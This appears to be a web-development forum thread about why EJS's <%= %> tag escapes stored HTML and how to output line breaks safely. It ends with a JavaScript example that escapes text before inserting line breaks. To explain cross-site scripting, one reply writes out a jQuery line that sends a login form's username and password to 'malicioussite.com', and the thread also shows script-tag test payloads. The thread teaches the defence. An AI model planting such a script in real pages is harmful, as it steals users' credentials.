HTML doesn't recognize tags in the MongoDB data that return

html
workspace
javascript
nodejs
mongodb

#1

I'm trying to show some data that I get from a textarea tag and saved in MongoDB. When I try to show it with the
tag, the HTML just shows it like this and doesn't get a new line:

Review about the short animation film 'PUAL':<br /><br /> "First, Congratulations! A very well <br />   <br /> thought out piece. The sound design

My code is:

html:

<div>
     <p> <%= person.quoteEng%></p>
</div>

node js:

router.get("/", function(req, res){
  // Get all persons from the DB and render the feedback page with them
  Person.find({}, function(err, allperson){
    if(err){
      console.log(err);
    } else {
      res.render("feedback/index", {persons: allperson});
    }
  });
});

and the form to get the textarea is regular, and on the Node.js side:

router.post("/", middleware.isLoggedIn, function(req, res){
  var quoteEng = req.body.quoteEng;
  var NewPerson = { quoteEng: quoteEng };
  Person.create(NewPerson, function(err, newlyPerson){
    if(err){
      console.log(err);
    } else {
      console.log(newlyPerson);
      res.redirect("feedback/0");
    }
  });
});

I used nl2br to change \n to
Please help me, thank you.


#2

It comes on the line
<%= person.quoteEng %>
This is EJS, and the tags you are using mean “output the value, escaping any HTML.” What you are looking for is “output the value, unescaped,” which can be achieved using this:
<%- person.quoteEng %>
Using a - instead of a =. Be aware that this means ANY HTML you output is left unescaped, which could be a security risk if the values are from users. For instance, I could perform a Cross Site Scripting attack like this:
<script>alert("XSS possible");</script>


#3

Thank you very, very, very much, man!
It solved my problem.
Can I get more information about this security risk?
For example, can the attacker get the username and password of the user that fills up the form?
And how can I protect my site from this?


#4

So, I’m not sure where the data in your DB comes from. If it comes from the user, you should follow the following workflow:
Validate input, escape output
Simply put, make sure what the user is putting in is OK (the length is okay, the name isn't already in the database, etc). When outputting to the page, escape the content, to prevent HTML from being inserted. While allowing HTML means you can use great features like the A tag, it also means I could put a script tag like this in your database, and you would output it for any user who visits that page:
$.post("malicioussite.com", { username: $("#loginform input").eq(0).val(), password: $("#loginform input").eq(1).val() });
(The above jQuery is probably not correct, but I just wrote it to demonstrate the below).
The above code would simply take the username and password fields in the login form of a website, and send their values to a malicious server. The user would be none the wiser, and this could happen for every user who loads that page.

The following is a real-world example of XSS, on the popular Tweeting platform Tweetdeck.

In the above, they were able to insert a script tag with a script that automatically retweeted the tweet, and then displayed a dialog to the user. Because script tags are invisible, the user would only see a heart:
❤️

This was simply because they forgot to escape output. Escaping output converts several characters into "HTML entities", which are rendered in the browser and not treated as HTML. So for instance, < becomes &lt;, > becomes &gt;, " becomes &quot;, and & becomes &amp;. You can actually see this: just click reply, type one of the above entities, and look in the preview.

This community also has some protection measures. Below is a script tag, but it will be auto-removed by Discourse, which is the software they use.

In the blank space above, I had the following:
<script>alert("hello");</script>
which I had to type as:
&lt;script&gt;alert("hello");&lt;/script&gt;

As long as you do all of the above, which you actually did by accident and didn’t want, you don’t have to worry about XSS. And the rule of thumb is: “Never trust the user. Ever.”
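Putting the advice from #2 and #4 together: escape the review text first and only then convert newlines to <br />, so the result can be printed with <%- %> without letting any user-supplied tag through; the unsafe ordering from the question (nl2br on the raw text, then unescaped output) is kept beside it for comparison. This is an added example, not code from any post in this thread; escapeHtml, escapeAndNl2br, validateQuote, the 2000-character limit and the sample review are all assumptions made for the demonstration.

```javascript
// Added example (not code from the thread): escape first, then nl2br, so the
// stored review can be printed with EJS's unescaped <%- %> tag without letting
// any user-supplied HTML through. Function names and the length limit are
// assumptions for this demonstration.

const ENTITY_MAP = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#39;",
};

// Same job as EJS's <%= %>: the five characters that can change HTML
// structure become entities, which the browser renders as plain text.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => ENTITY_MAP[ch]);
}

// Safe ordering: escape the user's text, THEN insert <br /> for newlines.
// The only tags in the result are the ones this function adds itself.
function escapeAndNl2br(text) {
  return escapeHtml(text).replace(/\r\n|\r|\n/g, "<br />");
}

// The ordering from the original question: nl2br on the raw text, then output
// with <%- %>. Any tag the user typed survives. Shown only for comparison.
function unsafeNl2br(text) {
  return String(text).replace(/\r\n|\r|\n/g, "<br />");
}

// "Validate input": reject non-strings, blank and oversized quotes before they
// reach MongoDB. 2000 characters is an assumed limit for this example.
const MAX_QUOTE_LENGTH = 2000;

function validateQuote(raw) {
  if (typeof raw !== "string") return { ok: false, reason: "not a string" };
  const quote = raw.trim();
  if (quote.length === 0) return { ok: false, reason: "empty" };
  if (quote.length > MAX_QUOTE_LENGTH) return { ok: false, reason: "too long" };
  return { ok: true, quote };
}

// Does the rendered HTML still contain a real <tagName ...> element?
function containsTag(html, tagName) {
  return new RegExp("<" + tagName + "[\\s>/]", "i").test(html);
}

// Constructed sample input: a review with a newline and an injected script tag.
const SAMPLE_QUOTE =
  'Review about the short film:\n<script>alert("XSS possible");</script>';

// Route usage (Mongoose + EJS, assumed to match the question's setup):
//   res.render("feedback/index", {
//     persons: allperson.map((p) => ({ ...p.toObject(), quoteHtml: escapeAndNl2br(p.quoteEng) })),
//   });
// and in the template:  <p><%- person.quoteHtml %></p>

function demo() {
  console.log("unsafe:", unsafeNl2br(SAMPLE_QUOTE));
  console.log("safe:  ", escapeAndNl2br(SAMPLE_QUOTE));
  console.log("script tag survives (unsafe)?", containsTag(unsafeNl2br(SAMPLE_QUOTE), "script"));
  console.log("script tag survives (safe)?  ", containsTag(escapeAndNl2br(SAMPLE_QUOTE), "script"));
}

demo();
```

With this ordering the line-break feature the question asked for works, and the <%- %> tag never sees a tag the user wrote: the `<script>` in the sample comes out as `&lt;script&gt;` and is displayed, not executed.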